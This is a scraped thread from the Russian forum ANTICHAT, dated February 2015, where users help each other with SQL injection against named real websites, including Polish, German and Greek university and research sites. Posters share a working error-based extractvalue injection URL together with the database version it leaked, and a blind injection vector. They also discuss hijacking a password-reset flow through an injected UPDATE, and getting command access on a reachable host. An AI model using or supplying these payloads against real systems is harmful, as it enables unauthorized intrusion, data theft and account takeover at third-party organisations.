ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.02.2015, 16:58
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7f dfdea@mail.com&FE%5Btt_address%5D%5Bname%5D=a'&FE% 5Btt_address%5D%5Bmodule_sys_dmail_category%5D=3&F E%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1
Чет вроде скуля не сложная, но немогу раскрутить...
ЗЫ при правильном вводе, ошибка пропадает, далее меняете 6l7fdfdea@mail.com на другое мыло
Код:
Code:
http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%5D=6l7fdfdea44544@mail.com&FE%5Btt_address%5D%5Bname%5D=lol%27and%28extractvalue%281,concat%280x5c,version%28%29%29%29%29=%271&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D=%203&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1
XPATH syntax error: '\5.5.38-log'
|
|
|
18.02.2015, 13:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
468
Репутация:
0
|
|
Need help!
Имеется уязвимость в скрипте восстановления пароля на почту:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
При этом $password генерится автоматом, а $name и $email передаются в $_POST без фильтрации.
Объеденение запросов через точку с запятой не проходят, а инъекция в селекте не подходит, т.к. она ничего не выводит.
Пробовал в селект подставить union select 'new@email' as email, чтобы подменить почту, но мускул ругается на дублирование имен полей.
Остается вариант сделать инъекцию в update, но ни в одной статье нет примеров инъекции в update после where.
Есть мысли как можно реализовать либо подмену одного из полей в селекте, либо выполнить второй update?
|
|
|
|
18.02.2015, 16:18
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
http://www.gfz-potsdam.de/forschung/ueberblick/departments/department-4/anorganische-und-isotopengeochemie/mitarbeiter/profil/judith-schicks/list/?cHash=dd9ae84d8ccec2384f97ec748975f738&no_cache=1 &tx_mkgfzstaffdirectory_normalview%5Bsectionid%5D= 18
Кто подберёт колонки?
|
|
|
|
18.02.2015, 20:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от n4yk
n4yk said:
Имеется уязвимость в скрипте восстановления пароля на почту:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
При этом $password генерится автоматом, а $name и $email передаются в $_POST без фильтрации.
Объеденение запросов через точку с запятой не проходят, а инъекция в селекте не подходит, т.к. она ничего не выводит.
Пробовал в селект подставить union select 'new@email' as email, чтобы подменить почту, но мускул ругается на дублирование имен полей.
Остается вариант сделать инъекцию в update, но ни в одной статье нет примеров инъекции в update после where.
Есть мысли как можно реализовать либо подмену одного из полей в селекте, либо выполнить второй update? крутите как слепую если нет вывода
|
|
|
|
19.02.2015, 19:54
|
|
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049
Репутация:
0
|
|
Есть IP там открыт 9999 порт , подключаюсь по нему к ссш ,в вожу логин и пароль который правильный на 100% ,консоль выдает следующие
Сообщение от None
( success ( 2 2 ( ) ( edit-pipeline svndiff1 absent-entries commit-revprops depth log-revprops partial-replay ) ) )
подскажите как можно подключиться к ссш чтобы выполнять команды?
Пробывал по svn через различные клиента , не подключается |
|
|
|
19.02.2015, 21:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от swat_
swat_ said:
Есть IP там открыт 9999 порт , подключаюсь по нему к ссш ,в вожу логин и пароль который правильный на 100% ,консоль выдает следующие
подскажите как можно подключиться к ссш чтобы выполнять команды?
Пробывал по svn через различные клиента , не подключается
а что с 22 портом?
|
|
|
|
20.02.2015, 02:51
|
|
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049
Репутация:
0
|
|
Сообщение от Br@!ns
Br@!ns said:
а что с 22 портом?
закрыт
|
|
|
|
20.02.2015, 15:25
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
http://www.aua.gr/probata/index.php?id=11))+/*+
хелп
|
|
|
|
20.02.2015, 17:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от DezMond™
DezMond™ said:
http://www.aua.gr/probata/index.php?id=11))+/*+
хелп
Сходу вывод не получил.
Вслепую вектор будет следующим:
Сообщение от None
?id=(11)or(mid(version(),1,1)=4)
4 версия mysql, смотрите на временную задержку
|
|
|
|
20.02.2015, 17:26
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от YaBtr
YaBtr said:
Сходу вывод не получил.
Вслепую вектор будет следующим:
4 версия mysql, смотрите на временную задержку
Слепую то я раскрутил, нужен вывод...
//блин, дак так и ставьте вопрос YaBtr
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
